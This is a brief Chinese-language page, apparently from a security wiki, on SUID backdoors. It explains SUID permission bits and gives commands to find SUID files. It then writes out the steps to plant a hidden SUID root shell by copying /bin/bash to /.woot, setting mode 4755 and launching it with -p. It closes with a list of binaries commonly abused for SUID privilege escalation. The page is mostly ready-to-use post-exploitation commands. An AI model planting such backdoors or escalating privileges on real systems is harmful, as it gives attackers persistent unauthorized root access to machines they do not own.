003-suid 后门.md

963 B / 2021-07-17 00:01:42
    ## suid 后门

suid说明：

1. 用户或属主对应的前三位权限的x位上如果有s就表示suid权限。当x位上没有小写x执行权限的时候，suid的权限显示的就是大S。

2. suid作用是让普通用户可以以root（或其他）的用户角色运行只有root（或其他）账号才能运行的程序或命令，或程序命令对应本来没有权限操作的文件等。

先查找具有suid的文件：

```bash
find / -perm +4000 -ls
find . -perm /4000
find / -user root -perm -4000 -print 2>/dev/null

```

将具有suid的复制到指定目录，然后再给权限执行。

```bash
cp /bin/bash /.woot
chmod 4755 /.woot
/.woot -p

```

![](images/security_wiki/15905815214342.png)


列出一些具有suid权限的文件、然后利用一些二进制文件的特性来执行额外的命令。

```bash
Nmap
Vim
find
Bash
More
Less
Nano
cp

```

常见的suid提权的程序。

![](images/security_wiki/15905815287149.png)